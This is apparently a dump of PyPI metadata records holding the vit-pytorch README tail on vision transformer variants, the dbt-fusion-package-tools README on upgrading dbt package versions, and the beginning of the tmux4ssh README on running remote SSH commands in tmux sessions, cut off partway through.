```

## Twins SVT

<img src="./images/twins_svt.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2104.13840">paper</a> proposes mixing local and global attention, along with a position encoding generator (proposed in <a href="https://arxiv.org/abs/2102.10882">CPVT</a>) and global average pooling, to achieve the same results as <a href="https://arxiv.org/abs/2103.14030">Swin</a>, without the extra complexity of shifted windows, CLS tokens, or positional embeddings.
```python
import torch
from vit_pytorch.twins_svt import TwinsSVT

model = TwinsSVT(
    num_classes = 1000,       # number of output classes
    s1_emb_dim = 64,          # stage 1 - patch embedding projected dimension
    s1_patch_size = 4,        # stage 1 - patch size for patch embedding
    s1_local_patch_size = 7,  # stage 1 - patch size for local attention
    s1_global_k = 7,          # stage 1 - global attention key / value reduction factor, defaults to 7 as specified in paper
    s1_depth = 1,             # stage 1 - number of transformer blocks (local attn -> ff -> global attn -> ff)
    s2_emb_dim = 128,         # stage 2 (same as above)
    s2_patch_size = 2,
    s2_local_patch_size = 7,
    s2_global_k = 7,
    s2_depth = 1,
    s3_emb_dim = 256,         # stage 3 (same as above)
    s3_patch_size = 2,
    s3_local_patch_size = 7,
    s3_global_k = 7,
    s3_depth = 5,
    s4_emb_dim = 512,         # stage 4 (same as above)
    s4_patch_size = 2,
    s4_local_patch_size = 7,
    s4_global_k = 7,
    s4_depth = 4,
    peg_kernel_size = 3,      # positional encoding generator kernel size
    dropout = 0.              # dropout
)

img = torch.randn(1, 3, 224, 224)

pred = model(img) # (1, 1000)
```

## RegionViT

<img src="./images/regionvit.png" width="400px"></img>

<img src="./images/regionvit2.png" width="400px"></img>

<a href="https://arxiv.org/abs/2106.02689">This paper</a> proposes to divide up the feature map into local regions, whereby the local tokens attend to each other. Each local region has its own regional token, which then attends to all of its local tokens as well as to the other regional tokens.

You can use it as follows

```python
import torch
from vit_pytorch.regionvit import RegionViT

model = RegionViT(
    dim = (64, 128, 256, 512),      # tuple of size 4, indicating dimension at each stage
    depth = (2, 2, 8, 2),           # depth of the region to local transformer at each stage
    window_size = 7,                # window size, which should be either 7 or 14
    num_classes = 1000,             # number of output classes
    tokenize_local_3_conv = False,  # whether to use a 3 layer convolution to encode the local tokens from the image. the paper uses this for the smaller models, but uses only 1 conv (set to False) for the larger models
    use_peg = False,                # whether to use positional generating module. they used this for object detection for a boost in performance
)

img = torch.randn(1, 3, 224, 224)

pred = model(img) # (1, 1000)
```

## CrossFormer

<img src="./images/crossformer.png" width="400px"></img>

<img src="./images/crossformer2.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2108.00154">paper</a> beats PVT and Swin using alternating local and global attention. The global attention is done across the windowing dimension for reduced complexity, much like the scheme used for axial attention. They also have a cross-scale embedding layer, which they show to be a generic layer that can improve all vision transformers. Dynamic relative positional bias was also formulated to allow the net to generalize to images of greater resolution.

```python
import torch
from vit_pytorch.crossformer import CrossFormer

model = CrossFormer(
    num_classes = 1000,                # number of output classes
    dim = (64, 128, 256, 512),         # dimension at each stage
    depth = (2, 2, 8, 2),              # depth of transformer at each stage
    global_window_size = (8, 4, 2, 1), # global window sizes at each stage
    local_window_size = 7,             # local window size (can be customized for each stage, but in paper, held constant at 7 for all stages)
)

img = torch.randn(1, 3, 224, 224)

pred = model(img) # (1, 1000)
```

## ScalableViT

<img src="./images/scalable-vit-1.png" width="400px"></img>

<img src="./images/scalable-vit-2.png" width="400px"></img>

This Bytedance AI <a href="https://arxiv.org/abs/2203.10790">paper</a> proposes the Scalable Self Attention (SSA) and the Interactive Windowed Self Attention (IWSA) modules. The SSA alleviates the computation needed at earlier stages by reducing the key / value feature map by some factor (`reduction_factor`), while modulating the dimension of the queries and keys (`ssa_dim_key`).
The IWSA performs self attention within local windows, similar to other vision transformer papers. However, they add a residual of the values, passed through a convolution of kernel size 3, which they named the Local Interactive Module (LIM).

They make the claim in this paper that this scheme outperforms Swin Transformer, and also demonstrate competitive performance against CrossFormer.

You can use it as follows (ex. ScalableViT-S)

```python
import torch
from vit_pytorch.scalable_vit import ScalableViT

model = ScalableViT(
    num_classes = 1000,
    dim = 64,                           # starting model dimension. at every stage, dimension is doubled
    heads = (2, 4, 8, 16),              # number of attention heads at each stage
    depth = (2, 2, 20, 2),              # number of transformer blocks at each stage
    ssa_dim_key = (40, 40, 40, 32),     # the dimension of the attention keys (and queries) for SSA. in the paper, they represented this as a scale factor on the base dimension per key (ssa_dim_key / dim_key)
    reduction_factor = (8, 4, 2, 1),    # downsampling of the key / values in SSA. in the paper, this was represented as (reduction_factor ** -2)
    window_size = (64, 32, None, None), # window size of the IWSA at each stage. None means no windowing needed
    dropout = 0.1,                      # attention and feedforward dropout
)

img = torch.randn(1, 3, 256, 256)

preds = model(img) # (1, 1000)
```

## SepViT

<img src="./images/sep-vit.png" width="400px"></img>

Another <a href="https://arxiv.org/abs/2203.15380">Bytedance AI paper</a>, it proposes a depthwise-pointwise self-attention layer that seems largely inspired by mobilenet's depthwise-separable convolution. The most interesting aspect is the reuse of the feature map from the depthwise self-attention stage as the values for the pointwise self-attention, as shown in the diagram above.
I have decided to include only the version of `SepViT` with this specific self-attention layer, as the grouped attention layers are neither remarkable nor novel, and the authors were not clear on how they treated the window tokens for the group self-attention layer. Besides, it seems like with the `DSSA` layer alone, they were able to beat Swin.

ex. SepViT-Lite

```python
import torch
from vit_pytorch.sep_vit import SepViT

v = SepViT(
    num_classes = 1000,
    dim = 32,              # dimensions of first stage, which doubles every stage (32, 64, 128, 256) for SepViT-Lite
    dim_head = 32,         # attention head dimension
    heads = (1, 2, 4, 8),  # number of heads per stage
    depth = (1, 2, 6, 2),  # number of transformer blocks per stage
    window_size = 7,       # window size of DSS Attention block
    dropout = 0.1          # dropout
)

img = torch.randn(1, 3, 224, 224)

preds = v(img) # (1, 1000)
```

## MaxViT

<img src="./images/max-vit.png" width="400px"></img>

<a href="https://arxiv.org/abs/2204.01697">This paper</a> proposes a hybrid convolutional / attention network, using MBConv from the convolution side, and then block / grid axial sparse attention. They also claim this specific vision transformer is good for generative models (GANs).

ex.
MaxViT-S

```python
import torch
from vit_pytorch.max_vit import MaxViT

v = MaxViT(
    num_classes = 1000,
    dim_conv_stem = 64,           # dimension of the convolutional stem, would default to dimension of first layer if not specified
    dim = 96,                     # dimension of first layer, doubles every layer
    dim_head = 32,                # dimension of attention heads, kept at 32 in paper
    depth = (2, 2, 5, 2),         # number of MaxViT blocks per stage, which consists of MBConv, block-like attention, grid-like attention
    window_size = 7,              # window size for block and grids
    mbconv_expansion_rate = 4,    # expansion rate of MBConv
    mbconv_shrinkage_rate = 0.25, # shrinkage rate of squeeze-excitation in MBConv
    dropout = 0.1                 # dropout
)

img = torch.randn(2, 3, 224, 224)

preds = v(img) # (2, 1000)
```

## NesT

<img src="./images/nest.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2105.12723">paper</a> decided to process the image in hierarchical stages, with attention only within tokens of local blocks, which aggregate as they move up the hierarchy. The aggregation is done in the image plane, and contains a convolution and subsequent maxpool to allow it to pass information across the boundary.

You can use it with the following code (ex. NesT-T)

```python
import torch
from vit_pytorch.nest import NesT

nest = NesT(
    image_size = 224,
    patch_size = 4,
    dim = 96,
    heads = 3,
    num_hierarchies = 3,        # number of hierarchies
    block_repeats = (2, 2, 8),  # the number of transformer blocks at each hierarchy, starting from the bottom
    num_classes = 1000
)

img = torch.randn(1, 3, 224, 224)

pred = nest(img) # (1, 1000)
```

## MobileViT

<img src="./images/mbvit.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2110.02178">paper</a> introduces MobileViT, a lightweight and general-purpose vision transformer for mobile devices. MobileViT presents a different perspective for the global processing of information with transformers.

You can use it with the following code (ex.
mobilevit_xs)

```python
import torch
from vit_pytorch.mobile_vit import MobileViT

mbvit_xs = MobileViT(
    image_size = (256, 256),
    dims = [96, 120, 144],
    channels = [16, 32, 48, 48, 64, 64, 80, 80, 96, 96, 384],
    num_classes = 1000
)

img = torch.randn(1, 3, 256, 256)

pred = mbvit_xs(img) # (1, 1000)
```

## XCiT

<img src="./images/xcit.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2106.09681">paper</a> introduces cross covariance attention (abbreviated XCA). One can think of it as doing attention across the feature dimension rather than the spatial one (another perspective would be a dynamic 1x1 convolution, the kernel being an attention map defined by spatial correlations).

Technically, this amounts to simply transposing the queries, keys, and values before executing cosine similarity attention with a learned temperature.

```python
import torch
from vit_pytorch.xcit import XCiT

v = XCiT(
    image_size = 256,
    patch_size = 32,
    num_classes = 1000,
    dim = 1024,
    depth = 12,                  # depth of xcit transformer
    cls_depth = 2,               # depth of cross attention of CLS tokens to patch, attention pool at end
    heads = 16,
    mlp_dim = 2048,
    dropout = 0.1,
    emb_dropout = 0.1,
    layer_dropout = 0.05,        # randomly dropout 5% of the layers
    local_patch_kernel_size = 3  # kernel size of the local patch interaction module (depthwise convs)
)

img = torch.randn(1, 3, 256, 256)

preds = v(img) # (1, 1000)
```

## Simple Masked Image Modeling

<img src="./images/simmim.png" width="400px"/>

This <a href="https://arxiv.org/abs/2111.09886">paper</a> proposes a simple masked image modeling (SimMIM) scheme, using only a linear projection off the masked tokens into pixel space followed by an L1 loss with the pixel values of the masked patches. Results are competitive with other more complicated approaches.
You can use this as follows

```python
import torch
from vit_pytorch import ViT
from vit_pytorch.simmim import SimMIM

v = ViT(
    image_size = 256,
    patch_size = 32,
    num_classes = 1000,
    dim = 1024,
    depth = 6,
    heads = 8,
    mlp_dim = 2048
)

mim = SimMIM(
    encoder = v,
    masking_ratio = 0.5  # they found 50% to yield the best results
)

images = torch.randn(8, 3, 256, 256)

loss = mim(images)
loss.backward()

# that's all!
# do the above in a for loop many times with a lot of images and your vision transformer will learn

torch.save(v.state_dict(), './trained-vit.pt')
```

## Masked Autoencoder

<img src="./images/mae.png" width="400px"/>

A new <a href="https://arxiv.org/abs/2111.06377">Kaiming He paper</a> proposes a simple autoencoder scheme where the vision transformer attends to a set of unmasked patches, and a smaller decoder tries to reconstruct the masked pixel values.

<a href="https://www.youtube.com/watch?v=LKixq2S2Pz8">DeepReader quick paper review</a>

<a href="https://www.youtube.com/watch?v=Dp6iICL2dVI">AI Coffeebreak with Letitia</a>

You can use it with the following code

```python
import torch
from vit_pytorch import ViT, MAE

v = ViT(
    image_size = 256,
    patch_size = 32,
    num_classes = 1000,
    dim = 1024,
    depth = 6,
    heads = 8,
    mlp_dim = 2048
)

mae = MAE(
    encoder = v,
    masking_ratio = 0.75,  # the paper recommended 75% masked patches
    decoder_dim = 512,     # paper showed good results with just 512
    decoder_depth = 6      # anywhere from 1 to 8
)

images = torch.randn(8, 3, 256, 256)

loss = mae(images)
loss.backward()

# that's all!
# do the above in a for loop many times with a lot of images and your vision transformer will learn

# save your improved vision transformer
torch.save(v.state_dict(), './trained-vit.pt')
```

## Masked Patch Prediction

Thanks to <a href="https://github.com/zankner">Zach</a>, you can train using the original masked patch prediction task presented in the paper, with the following code.
```python
import torch
from vit_pytorch import ViT
from vit_pytorch.mpp import MPP

model = ViT(
    image_size = 256,
    patch_size = 32,
    num_classes = 1000,
    dim = 1024,
    depth = 6,
    heads = 8,
    mlp_dim = 2048,
    dropout = 0.1,
    emb_dropout = 0.1
)

mpp_trainer = MPP(
    transformer = model,
    patch_size = 32,
    dim = 1024,
    mask_prob = 0.15,          # probability of using token in masked prediction task
    random_patch_prob = 0.30,  # probability of randomly replacing a token being used for mpp
    replace_prob = 0.50,       # probability of replacing a token being used for mpp with the mask token
)

opt = torch.optim.Adam(mpp_trainer.parameters(), lr = 3e-4)

def sample_unlabelled_images():
    return torch.FloatTensor(20, 3, 256, 256).uniform_(0., 1.)

for _ in range(100):
    images = sample_unlabelled_images()
    loss = mpp_trainer(images)
    opt.zero_grad()
    loss.backward()
    opt.step()

# save your improved network
torch.save(model.state_dict(), './pretrained-net.pt')
```

## Masked Position Prediction

<img src="./images/mp3.png" width="400px"></img>

New <a href="https://arxiv.org/abs/2207.07611">paper</a> that introduces a masked position prediction pre-training criterion. This strategy is more efficient than the Masked Autoencoder strategy and has comparable performance.

```python
import torch
from vit_pytorch.mp3 import ViT, MP3

v = ViT(
    num_classes = 1000,
    image_size = 256,
    patch_size = 8,
    dim = 1024,
    depth = 6,
    heads = 8,
    mlp_dim = 2048,
    dropout = 0.1,
)

mp3 = MP3(
    vit = v,
    masking_ratio = 0.75
)

images = torch.randn(8, 3, 256, 256)

loss = mp3(images)
loss.backward()

# that's all!
# do the above in a for loop many times with a lot of images and your vision transformer will learn

# save your improved vision transformer
torch.save(v.state_dict(), './trained-vit.pt')
```

## Adaptive Token Sampling

<img src="./images/ats.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2111.15667">paper</a> proposes to use the CLS attention scores, re-weighted by the norms of the value heads, as a means to discard unimportant tokens at different layers.
```python
import torch
from vit_pytorch.ats_vit import ViT

v = ViT(
    image_size = 256,
    patch_size = 16,
    num_classes = 1000,
    dim = 1024,
    depth = 6,
    max_tokens_per_depth = (256, 128, 64, 32, 16, 8), # a tuple that denotes the maximum number of tokens that any given layer should have. if the layer has greater than this amount, it will undergo adaptive token sampling
    heads = 16,
    mlp_dim = 2048,
    dropout = 0.1,
    emb_dropout = 0.1
)

img = torch.randn(4, 3, 256, 256)

preds = v(img) # (4, 1000)

# you can also get a list of the final sampled patch ids
# a value of -1 denotes padding

preds, token_ids = v(img, return_sampled_token_ids = True) # (4, 1000), (4, <=8)
```

## Patch Merger

<img src="./images/patch_merger.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2202.12015">paper</a> proposes a simple module (Patch Merger) for reducing the number of tokens at any layer of a vision transformer without sacrificing performance.

```python
import torch
from vit_pytorch.vit_with_patch_merger import ViT

v = ViT(
    image_size = 256,
    patch_size = 16,
    num_classes = 1000,
    dim = 1024,
    depth = 12,
    heads = 8,
    patch_merge_layer = 6,       # at which transformer layer to do patch merging
    patch_merge_num_tokens = 8,  # the output number of tokens from the patch merge
    mlp_dim = 2048,
    dropout = 0.1,
    emb_dropout = 0.1
)

img = torch.randn(4, 3, 256, 256)

preds = v(img) # (4, 1000)
```

One can also use the `PatchMerger` module by itself

```python
import torch
from vit_pytorch.vit_with_patch_merger import PatchMerger

merger = PatchMerger(
    dim = 1024,
    num_tokens_out = 8  # output number of tokens
)

features = torch.randn(4, 256, 1024) # (batch, num tokens, dimension)

out = merger(features) # (4, 8, 1024)
```

## Vision Transformer for Small Datasets

<img src="./images/vit_for_small_datasets.png" width="400px"></img>

This <a href="https://arxiv.org/abs/2112.13492">paper</a> proposes a new image-to-patch function that incorporates shifts of the image, before normalizing and dividing the image into
patches. I have found shifting to be extremely helpful in some other transformers work, so decided to include this for further explorations. It also includes the `LSA` with the learned temperature and masking out of a token's attention to itself.

You can use it as follows:

```python
import torch
from vit_pytorch.vit_for_small_dataset import ViT

v = ViT(
    image_size = 256,
    patch_size = 16,
    num_classes = 1000,
    dim = 1024,
    depth = 6,
    heads = 16,
    mlp_dim = 2048,
    dropout = 0.1,
    emb_dropout = 0.1
)

img = torch.randn(4, 3, 256, 256)

preds = v(img) # (4, 1000)
```

You can also use the `SPT` from this paper as a standalone module

```python
import torch
from vit_pytorch.vit_for_small_dataset import SPT

spt = SPT(
    dim = 1024,
    patch_size = 16,
    channels = 3
)

img = torch.randn(4, 3, 256, 256)

tokens = spt(img) # (4, 256, 1024)
```

## 3D ViT

By popular request, I will start extending a few of the architectures in this repository to 3D ViTs, for use with video, medical imaging, etc.

You will need to pass in two additional hyperparameters: (1) the number of frames `frames` and (2) the patch size along the frame dimension `frame_patch_size`

For starters, 3D ViT

```python
import torch
from vit_pytorch.vit_3d import ViT

v = ViT(
    image_size = 128,       # image size
    frames = 16,            # number of frames
    image_patch_size = 16,  # image patch size
    frame_patch_size = 2,   # frame patch size
    num_classes = 1000,
    dim = 1024,
    depth = 6,
    heads = 8,
    mlp_dim = 2048,
    dropout = 0.1,
    emb_dropout = 0.1
)

video = torch.randn(4, 3, 16, 128, 128) # (batch, channels, frames, height, width)

preds = v(video) # (4, 1000)
```

3D Simple ViT

```python
import torch
from vit_pytorch.simple_vit_3d import SimpleViT

v = SimpleViT(
    image_size = 128,       # image size
    frames = 16,            # number of frames
    image_patch_size = 16,  # image patch size
    frame_patch_size = 2,   # frame patch size
    num_classes = 1000,
    dim = 1024,
    depth = 6,
    heads = 8,
    mlp_dim = 2048
)

video = torch.randn(4, 3, 16, 128, 128) # (batch, channels, frames, height, width)

preds = v(video) # (4, 1000)
```

3D version of <a href="https://github.com/lucidrains/vit-pytorch#cct">CCT</a>

```python
import torch
from vit_pytorch.cct_3d import CCT

cct = CCT(
    img_size = 224,
    num_frames = 8,
    embedding_dim = 384,
    n_conv_layers = 2,
    frame_kernel_size = 3,
    kernel_size = 7,
    stride = 2,
    padding = 3,
    pooling_kernel_size = 3,
    pooling_stride = 2,
    pooling_padding = 1,
    num_layers = 14,
    num_heads = 6,
    mlp_ratio = 3.,
    num_classes = 1000,
    positional_embedding = 'learnable'
)

video = torch.randn(1, 3, 8, 224, 224) # (batch, channels, frames, height, width)

pred = cct(video)
```

## ViViT

<img src="./images/vivit.png" width="350px"></img>

This <a href="https://arxiv.org/abs/2103.15691">paper</a> offers 3 different types of architectures for efficient attention over videos, with the main theme being factorizing the attention across space and time. This repository includes the factorized encoder and the factorized self-attention variants. The factorized encoder variant is a spatial transformer followed by a temporal one. The factorized self-attention variant is a spatio-temporal transformer with alternating spatial and temporal self-attention layers.

```python
import torch
from vit_pytorch.vivit import ViT

v = ViT(
    image_size = 128,       # image size
    frames = 16,            # number of frames
    image_patch_size = 16,  # image patch size
    frame_patch_size = 2,   # frame patch size
    num_classes = 1000,
    dim = 1024,
    spatial_depth = 6,      # depth of the spatial transformer
    temporal_depth = 6,     # depth of the temporal transformer
    heads = 8,
    mlp_dim = 2048,
    variant = 'factorized_encoder', # or 'factorized_self_attention'
)

video = torch.randn(4, 3, 16, 128, 128) # (batch, channels, frames, height, width)

preds = v(video) # (4, 1000)
```

## Parallel ViT

<img src="./images/parallel-vit.png" width="350px"></img>

This <a href="https://arxiv.org/abs/2203.09795">paper</a> proposes parallelizing multiple attention and feedforward blocks per layer
text/markdown
null
Phil Wang <lucidrains@gmail.com>
null
null
MIT License Copyright (c) 2020 Phil Wang Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
artificial intelligence, attention mechanism, image recognition
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Topic :: Scientific/Engineering :: Artificial Intelligence", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.8", "P...
[]
null
null
>=3.8
[]
[]
[]
[ "einops>=0.8.2", "torch>=2.4", "torchvision", "pytest; extra == \"test\"", "torch==2.4.0; extra == \"test\"", "torchvision==0.19.0; extra == \"test\"" ]
[]
[]
[]
[ "Homepage, https://codeberg.org/lucidrains/vit-pytorch", "Repository, https://codeberg.org/lucidrains/vit-pytorch" ]
uv/0.8.13
2026-02-19T22:11:02.432579
vit_pytorch-1.18.0.tar.gz
138,768
0a/98/dc23c54fc996a5d127b989b9bbe426058ed27f7d76f0e40714f2cd991017/vit_pytorch-1.18.0.tar.gz
source
sdist
null
false
1641fd309561f36d57107ff9e9f5d672
62c4e92af02bc0564ebc5823f941a4ef17496c93be65d84b9d155f6aeb13dd4f
0a98dc23c54fc996a5d127b989b9bbe426058ed27f7d76f0e40714f2cd991017
null
[ "LICENSE" ]
767
2.4
dbt-fusion-package-tools
0.20.0
Add your description here
# Package Management

This directory contains code used by the `packages` option in the CLI that upgrades packages in a project to a Fusion-compatible version.

The code is centered on four classes:

* `DbtPackageFile`: represents a file (currently packages.yml or dependencies.yml) that contains package dependencies for a project
* `DbtPackage`: represents a package that is installed as a dependency for the project
* `DbtPackageVersion`: represents a specific version of a package
* `DbtPackageTextFile`: contains the raw lines of text from package dependency files. This is used when upgrading packages so we can replace just the version strings within a file without affecting the rest of the file layout (such as comments).

## How the CLI works

The `packages` command calls the `upgrade_packages` function in `main.py`. This then calls:

* `generate_package_dependencies`: extracts dependencies from the project's packages.yml/dependencies.yml file and identifies installed package versions in `dbt_packages`
  * Returns a `DbtPackageFile` if a packages.yml/dependencies.yml file is found and specifies at least one package; otherwise, None
* `check_for_package_upgrades`: traverses the dependencies in the `DbtPackageFile` and, for each package, determines if the currently installed version is Fusion compatible; if not, it looks for any Fusion-compatible versions of the package
  * Returns a list of `PackageVersionUpgradeResult`
  * The length should exactly match the number of packages in the `DbtPackageFile`'s dependencies
* `upgrade_package_versions`: takes the `PackageVersionUpgradeResult` list and, if any packages need updates, identifies the required changes in packages.yml. For a dry run, it prints out the new packages.yml; otherwise, it actually makes the changes in the file.
  * Returns a single `PackageUpgradeResult`
* `print_to_console` on the `PackageUpgradeResult`

`upgrade_packages` will generate an error if:

* the path specified in `--path` does not exist or isn't a directory
* `generate_package_dependencies` can't find a packages.yml or dependencies.yml
* `generate_package_dependencies` found a packages.yml or dependencies.yml but it didn't contain any package dependencies

## Scripts

* Used to extract info used in the package upgrade CLI:
  * `get_package_hub_files.py`: downloads package information from package hub (hub.getdbt.com) for all versions of all packages
    * Output: `package_output.json`
  * `get_fusion_compatible_versions.py`: loads `package_output.json` and summarizes Fusion compatibility across all versions for each package
    * Output: `fusion_version_compatibility_output.json` and `fusion_version_compatibility_output.py`
* Not used as an input to the package upgrade CLI:
  * `packages_with_fusion_compatibility_changes.py`: reads `fusion_version_compatibility_output.py` and generates a CSV summary of packages for analytics use
    * Output: `packages.csv`

`get_package_hub_files.py` and `get_fusion_compatible_versions.py` are used to pull data from the public package registry (hub.getdbt.com) and extract Fusion compatibility information from the available versions. This is essentially a local cache of package information to bootstrap autofix. We need to know the lower bound of Fusion-compatible versions for a package, but we also know that older versions of packages will not change, so caching this locally removes a lot of repetitive network calls and text parsing, which means faster run times and fewer failures due to network issues.

The output from these two scripts is `fusion_version_compatibility_output.py`, which contains a single constant, `FUSION_VERSION_COMPATIBILITY_OUTPUT`. This is then used in `DbtPackage`'s `merge_fusion_compatibility_output` to populate compatible versions.
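The role `DbtPackageTextFile` plays in the flow above, replacing only the version strings while leaving comments and layout untouched, can be sketched as follows. This is a hypothetical illustration, not the module's actual implementation:

```python
def upgrade_version_in_lines(lines, old_version, new_version):
    """Replace only the version token; leave comments and layout untouched."""
    out = []
    for line in lines:
        # Only touch lines carrying the old version string; everything else
        # (comments, blank lines, other keys) passes through verbatim.
        if old_version in line:
            line = line.replace(old_version, new_version)
        out.append(line)
    return out

original = [
    "packages:",
    "  - package: dbt-labs/dbt_utils",
    '    version: "1.1.0"  # pinned for prod',
]
upgraded = upgrade_version_in_lines(original, "1.1.0", "1.3.0")
```

Here the trailing comment and indentation survive the upgrade, which is the whole point of operating on raw text lines rather than re-serializing parsed YAML.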
## TODO

* Private packages
  * Check require_dbt_version in installed private packages
  * Need a way to match the dependency in packages.yml (since it doesn't have the name, which is what is used for public packages)
* Match the version specifier type when upgrading packages
  * Currently, if the package config specifies a version like ">1.0.1" and we need to upgrade to 1.0.2, it gets replaced with "1.0.2"
  * Should instead replace with the same format, like ">1.0.2"
* Get latest versions from package hub instead of using the cache
* Better handling for the version in a package's dbt_project.yml
  * Sometimes the version number in the package's dbt_project.yml doesn't actually match the release version, because package hub only checks the release tag on GitHub, so the installed-version check will set an incorrect version
  * Logic added in DbtPackageFile will override the installed version if it's less than the config's version range, but this isn't 100% reliable
  * Could instead refer to the package lock file to find the exact version
  * But probably not a huge problem, since we are only looking for require_dbt_version anyway and only look for upgrades if it's missing/incompatible
* Move package parsing logic to hubcap or package hub where appropriate
* Explicit overrides at the version level
  * Currently in scripts/get_fusion_compatible_versions and DbtPackageVersion.is_version_explicitly_disallowed_on_fusion, but the logic should be refined
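The specifier-format TODO above (">1.0.1" should become ">1.0.2", not "1.0.2") amounts to carrying the comparison operator over to the new version. A hypothetical sketch, with the function name invented for illustration:

```python
import re

def upgrade_specifier(spec: str, new_version: str) -> str:
    """Preserve the comparison operator (if any) when swapping the version."""
    # Split an optional operator prefix (e.g. ">", ">=", "~") off the version.
    m = re.match(r"^\s*([<>=!~^]*)\s*(.*)$", spec)
    op = m.group(1) if m else ""
    return f"{op}{new_version}"
```

With this, `upgrade_specifier(">1.0.1", "1.0.2")` yields `">1.0.2"`, while a bare `"1.0.1"` still becomes `"1.0.2"`.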
text/markdown
null
null
null
null
null
null
[]
[]
null
null
<3.14,>=3.10
[]
[]
[]
[ "click<9.0,>=8.2.0", "dbt-protos>=1.0.410", "mashumaro<3.15,>=3.9", "pyyaml>=6.0.2; python_version >= \"3.13\"", "pyyaml>=6.0; python_version < \"3.13\"", "requests<3.0.0", "rich>=14.0.0", "typer>=0.16.0" ]
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:10:40.622556
dbt_fusion_package_tools-0.20.0.tar.gz
45,239
5f/88/0aeaaea9c23abdcc661d66123c1413d13ee45d1f7257580eaa915cb04524/dbt_fusion_package_tools-0.20.0.tar.gz
source
sdist
null
false
79c9bc86707d177b0ac76f02f96cd2c0
c8501d88d1de11b8799de8b7d0aec2926e445321c327631d7f5f607aa9f1b7e6
5f880aeaaea9c23abdcc661d66123c1413d13ee45d1f7257580eaa915cb04524
null
[]
758
2.4
tmux4ssh
0.1.0
Execute remote commands via SSH in tmux sessions with real-time output streaming
# tmux4ssh

Execute remote commands via SSH in tmux sessions with real-time output streaming and batch mode.

The purpose of this project is to facilitate long-running simulations, such as Spectre, on a remote Linux server under unstable internet connections, when the user does not have root access to the server and relies on specialized CAD software such as Cadence Spectre.

## Features

- **Real-time output streaming** - See command output as it happens
- **Tmux-based execution** - Commands run in persistent tmux sessions
- **Concurrent execution** - Run multiple commands in parallel with `--new`
- **Auto-new session** - Automatically creates a new session if a command is already running (default: on)
- **Directory inheritance** - `--new` sessions inherit the current directory from the default session
- **Auto-cleanup** - `--new` sessions automatically terminate when commands complete
- **Running command detection** - Prevents accidental command conflicts
- **Session management** - List running commands, attach/reattach to sessions, clean up idle sessions
- **Permanent log storage** - Timestamped logs preserved in `~/tmux_ssh_logs/`
- **Credential management** - Securely stores SSH credentials in the system keyring
- **Timeout support** - Configurable idle (default: 1 hour) and total timeouts
- **Server change detection** - Warns when a load-balanced hostname resolves to a different server

## Why tmux4ssh?
Standard SSH has limitations for long-running or critical remote tasks:

| Scenario | Standard SSH | tmux4ssh |
|----------|--------------|----------|
| Internet drops mid-command | Command killed (SIGHUP) | Command keeps running in tmux |
| Check progress after disconnect | Not possible | `tmux4ssh --attach` |
| Run concurrent commands | Manual session management | `tmux4ssh --new` |
| Stream output to local terminal | Works, but lost on disconnect | Persistent logs + reattach |

**The manual workaround** without tmux4ssh:

```bash
ssh -t user@host              # Interactive login
tmux new -s mysession         # Create tmux session
./long_running_script.sh      # Run command
# Ctrl+B, D to detach
# ... later, after reconnecting ...
ssh -t user@host tmux attach -t mysession   # Hope you remember the session name
```

**With tmux4ssh:**

```bash
tmux4ssh "./long_running_script.sh"   # Just run it
# ... connection drops, reconnect later ...
tmux4ssh --attach                     # Resume output streaming
```

## Installation

### Option 1: Install as Package (Recommended)

```bash
# Install in development mode
pip install -e ".[dev]"

# Install pre-commit hooks
pre-commit install
```

**Requirements:** Python 3.10 or higher

### Option 2: Use Prototype Without Installation

If you want to test without installing the package, use the standalone prototype script:

```bash
# Navigate to prototype directory
cd prototype

# Run directly with Python
python3 tmux_ssh.py -H myserver.com -U myuser "hostname"
```

See `prototype/README.md` for more details.
### Uninstall

```bash
pip uninstall tmux4ssh
```

## Usage

### Basic Commands

```bash
# SSH-compatible syntax (recommended)
tmux4ssh user@host "command"
tmux4ssh user@host:2222 "command"   # With custom port
tmux4ssh host "command"             # Uses saved username

# Flag-based syntax (also supported)
tmux4ssh -H myserver.com -U myuser "hostname"
tmux4ssh -p 2222 -H myserver.com -U myuser "hostname"

# Subsequent runs: host/user are remembered automatically
tmux4ssh "ls -la"
tmux4ssh "pwd"

# Override saved settings when needed
tmux4ssh -H otherserver.com "hostname"

# Set idle timeout (exit if no output for N seconds, default: 3600)
tmux4ssh -i 7200 "long_running_command"

# Set total timeout
tmux4ssh -t 3600 -i 1800 "very_long_command"
```

### Command Quoting

**When are quotes required?** Use quotes when your command contains:

- **Shell operators**: `&&`, `||`, `;`, `|`, `>`, `<`, `>>`, `2>&1`
- **Variable expansion**: `$VAR`, `$(command)`, backticks
- **Wildcards**: `*`, `?`, `[...]`
- **Spaces in arguments**: paths or strings with spaces

```bash
# REQUIRED: Commands with shell operators
tmux4ssh user@host "cmd1 && cmd2"              # Chain commands
tmux4ssh user@host "cmd1 || cmd2"              # OR operator
tmux4ssh user@host "cmd1; cmd2"                # Sequential
tmux4ssh user@host "cat file | grep pattern"   # Pipe
tmux4ssh user@host "echo hello > output.txt"   # Redirect

# REQUIRED: Commands with special characters
